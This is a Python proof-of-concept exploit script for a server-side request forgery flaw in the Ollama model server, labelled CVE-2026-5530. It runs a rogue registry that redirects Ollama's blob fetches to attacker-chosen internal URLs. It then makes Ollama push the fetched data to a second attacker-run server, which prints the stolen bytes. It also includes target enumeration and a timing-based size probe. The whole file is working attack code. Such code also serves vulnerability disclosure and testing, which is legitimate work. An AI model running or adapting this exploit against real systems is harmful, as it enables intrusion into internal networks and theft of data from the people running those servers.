#!/usr/bin/env python3 """ CVE-2026-5530 - Ollama SSRF via Registry Redirect + Exfiltration python3 poc.py targets.txt --registry-host host.docker.internal # enum python3 poc.py URL --exfil --size 960 --registry-host host.docker.internal # exfil python3 poc.py URL --probe --registry-host host.docker.internal # probe + exfil Author: David Rochester """ import argparse, hashlib, json, os, sys, threading, time from http.server import HTTPServer, BaseHTTPRequestHandler from urllib.request import Request, urlopen declared_size = 256 current_target = None exfil_blobs = [] any_exfil = False exfil_port = 10000 pull_counter = int(time.time()) registry_host = "127.0.0.1" def make_digest(): return "sha256:" + hashlib.sha256(str(pull_counter).encode()).hexdigest() def make_manifest(): d = make_digest() m = json.dumps({"schemaVersion": 2, "mediaType": "application/vnd.docker.distribution.manifest.v2+json", "config": {"mediaType": "application/vnd.docker.container.image.v1+json", "digest": d, "size": 1}, "layers": [{"mediaType": "application/vnd.ollama.image.model", "digest": d, "size": 1}]}).encode() return m, d class Rogue(BaseHTTPRequestHandler): def do_GET(self): self._r("GET") def do_HEAD(self): self._r("HEAD") def _r(self, m): p = self.path.split("?")[0] manifest, digest = make_manifest() if p in ("/v2", "/v2/"): self.send_response(200) self.send_header("Docker-Distribution-API-Version", "registry/2.0") self.end_headers() elif "/manifests/" in p: self.send_response(200) self.send_header("Content-Type", "application/vnd.docker.distribution.manifest.v2+json") self.send_header("Docker-Content-Digest", digest) self.send_header("Content-Length", str(len(manifest))) self.end_headers() if m == "GET": self.wfile.write(manifest) elif "/blobs/" in p: if m == "HEAD": self.send_response(200) self.send_header("Content-Length", str(declared_size)) self.end_headers() else: if any_exfil: print(f" [SSRF] -> {current_target}", flush=True) self.send_response(307) self.send_header("Location", current_target) self.send_header("Content-Length", "0") self.end_headers() else: self.send_response(404); self.end_headers() def log_message(self, *a): pass class Exfil(BaseHTTPRequestHandler): bufs = {} def do_GET(self): if self.path.split("?")[0] in ("/v2", "/v2/"): self.send_response(200) self.send_header("Docker-Distribution-API-Version", "registry/2.0") self.end_headers() else: self.send_response(404); self.end_headers() def do_HEAD(self): self.send_response(404); self.end_headers() def do_POST(self): if "/blobs/uploads" in self.path: uid = str(time.time_ns()) self.__class__.bufs[uid] = b"" host = self.headers.get("Host", f"{registry_host}:{exfil_port}") self.send_response(202) self.send_header("Location", f"http://{host}/v2/library/pwn/blobs/uploads/{uid}") self.send_header("Docker-Upload-UUID", uid) self.send_header("Range", "0-0") self.end_headers() else: self.send_response(404); self.end_headers() def do_PATCH(self): uid = self.path.rstrip("/").split("/")[-1].split("?")[0] cl = int(self.headers.get("Content-Length", 0)) data = self.rfile.read(cl) if cl else b"" if uid in self.__class__.bufs: self.__class__.bufs[uid] += data host = self.headers.get("Host", f"{registry_host}:{exfil_port}") self.send_response(202) self.send_header("Location", f"http://{host}{self.path}") self.send_header("Range", f"0-{len(self.__class__.bufs.get(uid, b''))}") self.end_headers() def do_PUT(self): if "/blobs/uploads/" in self.path: uid = self.path.split("/blobs/uploads/")[-1].split("?")[0] cl = int(self.headers.get("Content-Length", 0)) data = self.rfile.read(cl) if cl else b"" buf = self.__class__.bufs.pop(uid, b"") + data if buf: exfil_blobs.append(buf) print(f"\n [EXFIL] {len(buf)} bytes:") print(buf.decode("utf-8", errors="replace")[:4096]) print(flush=True) self.send_response(201) self.send_header("Docker-Content-Digest", "sha256:" + hashlib.sha256(buf).hexdigest()) self.end_headers() elif "/manifests/" in self.path: cl = int(self.headers.get("Content-Length", 0)) self.rfile.read(cl) self.send_response(201) self.send_header("Docker-Content-Digest", make_digest()) self.end_headers() else: self.send_response(404); self.end_headers() def log_message(self, *a): pass def pull(api, port): model = f"http://{registry_host}:{port}/library/pwn:latest" try: urlopen(Request(f"{api}/api/pull", data=json.dumps({"model": model, "insecure": True, "stream": False}).encode(), headers={"Content-Type": "application/json"}), timeout=8) return True except Exception: return False def exfiltrate(api, port): model = f"http://{registry_host}:{port}/library/pwn:latest" exfil_model = f"http://{registry_host}:{exfil_port}/library/pwn:latest" try: urlopen(Request(f"{api}/api/copy", data=json.dumps({"source": model, "destination": exfil_model}).encode(), headers={"Content-Type": "application/json"}), timeout=10) urlopen(Request(f"{api}/api/push", data=json.dumps({"model": exfil_model, "insecure": True, "stream": False}).encode(), headers={"Content-Type": "application/json"}), timeout=60) except Exception as e: print(f" [-] exfil failed: {e}", flush=True) def probe(api, port, lo=1, hi=4096, thresh=5.0): global declared_size, pull_counter print(f" [PROBE] binary search [{lo}, {hi}]") while lo < hi: mid = (lo + hi + 1) // 2 declared_size = mid pull_counter += 1 start = time.time() pull(api, port) elapsed = time.time() - start tag = "BIG" if elapsed >= thresh else "OK" print(f" [PROBE] CL={mid:<6} {elapsed:.1f}s [{tag}]", flush=True) if elapsed >= thresh: hi = mid - 1 else: lo = mid declared_size = lo print(f" [PROBE] size={lo}\n") return lo def load_targets(arg): if os.path.isfile(arg): with open(arg) as f: return [l.strip() for l in f if l.strip() and not l.startswith("#")] return [arg] def main(): global current_target, declared_size, pull_counter, exfil_port, registry_host ap = argparse.ArgumentParser(description="CVE-2026-5530 PoC") ap.add_argument("target", help="URL or file with URLs") ap.add_argument("-p", "--port", type=int, default=9999) ap.add_argument("--exfil-port", type=int, default=10000) ap.add_argument("--exfil", action="store_true", help="exfil with known --size") ap.add_argument("--probe", action="store_true", help="binary search for size, then exfil") ap.add_argument("--size", type=int, default=None, help="Content-Length (use with --exfil)") ap.add_argument("--registry-host", default="127.0.0.1", help="hostname Ollama uses to reach this machine (default: 127.0.0.1)") ap.add_argument("--ollama", default="http://127.0.0.1:11434") args = ap.parse_args() if args.exfil and not args.size: print(" --exfil requires --size"); sys.exit(1) targets = load_targets(args.target) if not targets: print("no targets"); sys.exit(1) registry_host = args.registry_host exfil_port = args.exfil_port if args.size: declared_size = args.size # start rogue registry rogue = HTTPServer(("0.0.0.0", args.port), Rogue) threading.Thread(target=rogue.serve_forever, daemon=True).start() if args.exfil or args.probe: exfil_srv = HTTPServer(("0.0.0.0", args.exfil_port), Exfil) threading.Thread(target=exfil_srv.serve_forever, daemon=True).start() global any_exfil any_exfil = args.exfil or args.probe mode = "probe" if args.probe else "exfil" if args.exfil else "enum" print(f"\n CVE-2026-5530 | {mode} | {len(targets)} targets\n") for t in targets: current_target = t if args.probe: print(f" [*] {t}") probe(args.ollama, args.port) pull_counter += 1 ok = pull(args.ollama, args.port) if ok: print(f" [+] blob captured, exfiltrating...") exfiltrate(args.ollama, args.port) else: print(f" [-] pull failed") elif args.exfil: print(f" [*] {t}") pull_counter += 1 ok = pull(args.ollama, args.port) if ok: print(f" [+] blob captured, exfiltrating...") exfiltrate(args.ollama, args.port) else: print(f" [-] pull failed") else: pull_counter += 1 declared_size = 1 start = time.time() ok = pull(args.ollama, args.port) elapsed = time.time() - start status = "ALIVE" if ok or elapsed < 5 else "DOWN/FILTERED" print(f" {status} {elapsed:.1f}s {t}", flush=True) print(f"\n done. {len(exfil_blobs)} blobs exfiltrated.\n") if __name__ == "__main__": main()